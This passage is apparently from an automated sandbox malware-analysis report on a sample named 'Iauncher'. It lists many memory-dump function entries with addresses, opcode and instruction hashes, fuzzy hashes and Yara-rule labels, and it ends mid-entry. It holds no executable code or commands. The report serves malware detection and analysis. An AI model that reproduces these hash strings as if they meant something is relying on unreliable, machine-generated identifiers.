                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 56b9045189142333f9251aa6d4bdc3db94a4f9c734c6866f8722cf0c5844b720
                                                                                                                                                    • Instruction ID: 37f8a0bd0e62dad3186823ee8e8a1637f3dccef07d1d70d5f5f8150b808087cb
                                                                                                                                                    • Opcode Fuzzy Hash: 56b9045189142333f9251aa6d4bdc3db94a4f9c734c6866f8722cf0c5844b720
                                                                                                                                                    • Instruction Fuzzy Hash: A6F0FC353003446BD716AFB59854ABF7FABEBC9211B044027F956CA351CB359C11D7B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDB8AC Relevance: .0, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bdfbda82a581917a4eea5fa6d54a7770cb594dd501759573019f5af7f8ae4118
                                                                                                                                                    • Instruction ID: 3cba08e4900273f31f3da8d1a4f3210e0a76a07a29054aad525a980d0770fb34
                                                                                                                                                    • Opcode Fuzzy Hash: bdfbda82a581917a4eea5fa6d54a7770cb594dd501759573019f5af7f8ae4118
                                                                                                                                                    • Instruction Fuzzy Hash: 56F02B363003486BDB126EA99C94ABF7E9BDBC8211B008417F9568B341CD30DC1297B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8570 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9bfd8672b426b4749332c0fa3c1e0ff696bf6f782de9eac807bdf90c4e167213
                                                                                                                                                    • Instruction ID: fdf75106ff3e074fb6463964b8b35b1d27c30d138980c8dc3050a142585a881f
                                                                                                                                                    • Opcode Fuzzy Hash: 9bfd8672b426b4749332c0fa3c1e0ff696bf6f782de9eac807bdf90c4e167213
                                                                                                                                                    • Instruction Fuzzy Hash: 2CF04F36B0011AAFCF059F99DC04DAEBBFAFB8C250B008066F508D7220E7319D219BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9121 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac5c6782653bac4b74504a9e8f9f62dd801e0b7f2105cb9ccdd365b33a82e44f
                                                                                                                                                    • Instruction ID: 6bf0828ea1c0ea8be4049c0d4853c8958aae9caff0188d5f5de4b8216f40a43a
                                                                                                                                                    • Opcode Fuzzy Hash: ac5c6782653bac4b74504a9e8f9f62dd801e0b7f2105cb9ccdd365b33a82e44f
                                                                                                                                                    • Instruction Fuzzy Hash: 81014B75E44208AFC700DFA4D098BEDBBF0EB4A310F1581E5D948A7351D7706E45CB85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDDCE3 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ab33ce27328e68b052de4b731c15f26a88a0b0e8d30b734b93393e2310b44819
                                                                                                                                                    • Instruction ID: 0132973d849b2dfa4e65bf789495cba9477827a60ed3727a2c44101d934145dd
                                                                                                                                                    • Opcode Fuzzy Hash: ab33ce27328e68b052de4b731c15f26a88a0b0e8d30b734b93393e2310b44819
                                                                                                                                                    • Instruction Fuzzy Hash: 92F0CD6128E3844EDF1AA378A418765BF65EB43209F28C0EBD00CCA283C16BD486C376
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD9B50 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7dc7c43379cb8bfbca7a2b380b35c80540aaa97ee71278abced517f662d8725d
                                                                                                                                                    • Instruction ID: 14686071ac31701075ee614f2627a8e17c23ef629d24ab9a47260375bec9a871
                                                                                                                                                    • Opcode Fuzzy Hash: 7dc7c43379cb8bfbca7a2b380b35c80540aaa97ee71278abced517f662d8725d
                                                                                                                                                    • Instruction Fuzzy Hash: AEF0B430E50309ABCB00EBB4D8457ECF730FF82301F105266D11537190EB706A88CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD872C Relevance: .0, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d6ad275e02cb2218af30a698e4fda7706ee7df325e28ec0e7f15f7883151558a
                                                                                                                                                    • Instruction ID: 60841381e051c05fe474e0cd52738a8e76d5e1dabe73889ac0823cbc08f8c698
                                                                                                                                                    • Opcode Fuzzy Hash: d6ad275e02cb2218af30a698e4fda7706ee7df325e28ec0e7f15f7883151558a
                                                                                                                                                    • Instruction Fuzzy Hash: BAF05431E50309ABDB40EBE4D8946EDF735FFC3302F115626E15537190EB70AA58C655
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAD4A1 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d98f9736e34a70033461d9b6c039a32c6764d36bd5c2f307059bd3bcb964d30
                                                                                                                                                    • Instruction ID: cca6215be30b85f1ad0320d13eca2a0c25a6721f4847204611310116810afd04
                                                                                                                                                    • Opcode Fuzzy Hash: 9d98f9736e34a70033461d9b6c039a32c6764d36bd5c2f307059bd3bcb964d30
                                                                                                                                                    • Instruction Fuzzy Hash: F3F0F471D45208AFDB40EFB4D891AAEBBB0EB46200F2095AA8418B3391E7705E41CB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAB018 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4b9af44adaeb74d9e6dd918c9f8220a91610986a3baaf6ad31b2f2825ad9fa6f
                                                                                                                                                    • Instruction ID: d36f6ffdca5be1129bdb1bc5309d0e9d31990052b855422b9c4a588ced707fd9
                                                                                                                                                    • Opcode Fuzzy Hash: 4b9af44adaeb74d9e6dd918c9f8220a91610986a3baaf6ad31b2f2825ad9fa6f
                                                                                                                                                    • Instruction Fuzzy Hash: 92F0E770D45208EFDB45EFB8D8516ADBBF0AF46204F1095EAC419A32A0D7741E46CB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9130 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 94bfcf98fcc47b0ccf96acd095ce59f26788e3c3ac569bb076bca54df39b3c0c
                                                                                                                                                    • Instruction ID: b3ff31294b123d45f0663e2ea168a727788df8f44aad0c5ef7056729341b4422
                                                                                                                                                    • Opcode Fuzzy Hash: 94bfcf98fcc47b0ccf96acd095ce59f26788e3c3ac569bb076bca54df39b3c0c
                                                                                                                                                    • Instruction Fuzzy Hash: 41011474E44208AFCB00DFA8D098BEDBBF0AB4A300F1081E4D94867351C7306A84CB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9370 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 249af86a089b18388f20190cbcf36d2b43bc833c39d432169dbbc9ff494193eb
                                                                                                                                                    • Instruction ID: 86f6c337c25f5548232ba1703e44d5f5e162c2db55a4744590b66d90db2592dc
                                                                                                                                                    • Opcode Fuzzy Hash: 249af86a089b18388f20190cbcf36d2b43bc833c39d432169dbbc9ff494193eb
                                                                                                                                                    • Instruction Fuzzy Hash: 0AF0B7B1D05119AFDB44EFB8D4946ADBBF0FB89210F1095AA9818B3390EB715F41DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CACF28 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d4c9babb4b0929a03a68ff591cc1eb658da516bec80fddea8c9eed8eee9bb66
                                                                                                                                                    • Instruction ID: 5af730d59c8ddc53610fb977c6aab915faacdd32ae992e68a9e1237da51a750a
                                                                                                                                                    • Opcode Fuzzy Hash: 4d4c9babb4b0929a03a68ff591cc1eb658da516bec80fddea8c9eed8eee9bb66
                                                                                                                                                    • Instruction Fuzzy Hash: 45F05835340A018FC728DE6EE85086AB7E9EF88622310856AE25EC7730CB60EC018B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8500 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 13b3d1fcda43c941aef8e453f5eb67c24fd0f41b7c669dc400cc7e90ed6701af
                                                                                                                                                    • Instruction ID: 891181e63c14e0d1dcc52bccff9a567c515594498f853d01351c4d797da93126
                                                                                                                                                    • Opcode Fuzzy Hash: 13b3d1fcda43c941aef8e453f5eb67c24fd0f41b7c669dc400cc7e90ed6701af
                                                                                                                                                    • Instruction Fuzzy Hash: 8FF03A7A904108FFCB42DF94D944ED9BF76EF49310F188095E9081B271D7329AA6EF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA5628 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1b4d311f66d36cb89b0e8085d901a5f3e9af951d4f2587e9d82307b5aa0792c6
                                                                                                                                                    • Instruction ID: 79c6127bad6f28542f252973ac70da86c7e9f7fcf04df96c999f4ca55d6df64e
                                                                                                                                                    • Opcode Fuzzy Hash: 1b4d311f66d36cb89b0e8085d901a5f3e9af951d4f2587e9d82307b5aa0792c6
                                                                                                                                                    • Instruction Fuzzy Hash: ABF0E5B2F001156B8B14DA6AA810AAFBBAB8FD0264305C466A804D7254EE308E014B94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA81E8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 414b05a49f927524265233e495b42a6abfddca9cc8ded0fb6cddf313022d664f
                                                                                                                                                    • Instruction ID: c2172eb42bc92e8052dc903d41f18671efca6b2ca34c1619667b0873c01400d6
                                                                                                                                                    • Opcode Fuzzy Hash: 414b05a49f927524265233e495b42a6abfddca9cc8ded0fb6cddf313022d664f
                                                                                                                                                    • Instruction Fuzzy Hash: F101AF31804308EFCB06DFA8C8459ACBFB0FF46310F10829EE84857271D7319A92DB41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA6BC0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 951770f1c496da77b55b7b9820d5bd33b1f6774813ef10783d4245396960e1ef
                                                                                                                                                    • Instruction ID: 0997b5a099f2b9479a30c87bf1c64184b8b33dfae68d6cb3aa207e65136d3e2f
                                                                                                                                                    • Opcode Fuzzy Hash: 951770f1c496da77b55b7b9820d5bd33b1f6774813ef10783d4245396960e1ef
                                                                                                                                                    • Instruction Fuzzy Hash: 97F04F31D0020AEFCF00DFA8D8019EEFB75FF85310F148559E95467151D33266A6CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CACF19 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b1f5b8a56948ca4991ab9794afa4f7438859b985d084b7feb41892c1a8da750d
                                                                                                                                                    • Instruction ID: 650722f4f0d3c2655e9272c1ab54f8e0f88fb56c10c65a18ad11d017d81d45d3
                                                                                                                                                    • Opcode Fuzzy Hash: b1f5b8a56948ca4991ab9794afa4f7438859b985d084b7feb41892c1a8da750d
                                                                                                                                                    • Instruction Fuzzy Hash: 80F08C30205B028FC729CE79D850853BBF5EF8622130186AEE59BCB671DB20EC02CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAD4B0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d3341ae841ed1446e92d82e7cf03c4583af958afd6ccb7a9de2fb37984832fda
                                                                                                                                                    • Instruction ID: f1e1d10f3678a2ad36147879015eae027fcd3bd9d6bdde6f5fc5790df2f4c5c8
                                                                                                                                                    • Opcode Fuzzy Hash: d3341ae841ed1446e92d82e7cf03c4583af958afd6ccb7a9de2fb37984832fda
                                                                                                                                                    • Instruction Fuzzy Hash: 7CF0D470D45208AFDB44EFB8D890AAEBBF4FB45300F2095A98415B3390DB706E51DB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAB028 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 02a484c298bff763a33da8a9087036fd820751cd704bd04cf4ff00e1fd936478
                                                                                                                                                    • Instruction ID: 5c24f10d738452150de45792599af384954f3276ee06ac5b33fbea50f82ab3e5
                                                                                                                                                    • Opcode Fuzzy Hash: 02a484c298bff763a33da8a9087036fd820751cd704bd04cf4ff00e1fd936478
                                                                                                                                                    • Instruction Fuzzy Hash: C5F0D470D40208AFCB44EFB8D891AAEFBF1AB45200F1095A98418A3390DB705E55DF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9380 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b1bc0881e44ea1a1feaf29bef60663e19da9fc82289f14eadbd17c4022cae5e6
                                                                                                                                                    • Instruction ID: de5075f34770b1f60f6f654172e5b1e095df9f9a5a7994c7d5e27e243a72a3da
                                                                                                                                                    • Opcode Fuzzy Hash: b1bc0881e44ea1a1feaf29bef60663e19da9fc82289f14eadbd17c4022cae5e6
                                                                                                                                                    • Instruction Fuzzy Hash: 36F0D470E0520CEFCB44EFB8D850AAEFBF4BB49200F2095A98418A3390DB715F41DB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAFB40 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 76c7af11f706f74727469e45521420bf35253267963f38a27e6275e75dceb714
                                                                                                                                                    • Instruction ID: 73a5809b697eb4a5f3022fbea415e98d8e80ecd65f19726353995512d22dc59c
                                                                                                                                                    • Opcode Fuzzy Hash: 76c7af11f706f74727469e45521420bf35253267963f38a27e6275e75dceb714
                                                                                                                                                    • Instruction Fuzzy Hash: E6F0D470D0120CEFDB84EFB8D850AAEFBF4AB49200F2095A98418B3390DB705E41DB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CACF70 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 15162d172ebd5dad31cbc788afe83374023d38312cb19e884771f199f6a975ab
                                                                                                                                                    • Instruction ID: c81843007a5cf8b583fa75a11d6cede1d11429d062ffb5ce478773d12dd65c48
                                                                                                                                                    • Opcode Fuzzy Hash: 15162d172ebd5dad31cbc788afe83374023d38312cb19e884771f199f6a975ab
                                                                                                                                                    • Instruction Fuzzy Hash: E5F0E5BAB401148FC3018768F849AA5B7A49BD5329F1480B7F144CB622DB7188068750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDD7E3 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8a642051ad6334cffd52d4b8f72c3781040aed25bd124739116bc28c5094951f
                                                                                                                                                    • Instruction ID: 6cc3e3ffb19c65cf5fc18e1bbb7c81d4c0ad301473b94175509878f3b584c381
                                                                                                                                                    • Opcode Fuzzy Hash: 8a642051ad6334cffd52d4b8f72c3781040aed25bd124739116bc28c5094951f
                                                                                                                                                    • Instruction Fuzzy Hash: 65E068333406142BE3219609EC01F9ABBCACBD4712F084126F204DB2C1C9E5F80283A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8E90 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 41aa86987bd2d89ef3b5adfd4e7463f34ac60e7f54f4acae41b344bea433f83e
                                                                                                                                                    • Instruction ID: 2e62d933a43202e7dd96319a9a6cfbc7b71b0a8ff5dfc76a7a92dd2bae089c6a
                                                                                                                                                    • Opcode Fuzzy Hash: 41aa86987bd2d89ef3b5adfd4e7463f34ac60e7f54f4acae41b344bea433f83e
                                                                                                                                                    • Instruction Fuzzy Hash: A4E0C27BA40119BBDF018E85ED45FDA7FA9FF9C665F064111FE08A7250C232D821EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA81F8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aa07065032cca63fde8d364b65ab7b061a8fea19ab75cda383dc0860ce9cd846
                                                                                                                                                    • Instruction ID: 84b33e50e284b5f5502e0ddddc1101389e4fd58b4f1b872afabab9edab6a1efc
                                                                                                                                                    • Opcode Fuzzy Hash: aa07065032cca63fde8d364b65ab7b061a8fea19ab75cda383dc0860ce9cd846
                                                                                                                                                    • Instruction Fuzzy Hash: F0F03035904208EBCF01EFA8D8449ADBB75FF45300F10C259E84827221DB319A91EB41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CACF80 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
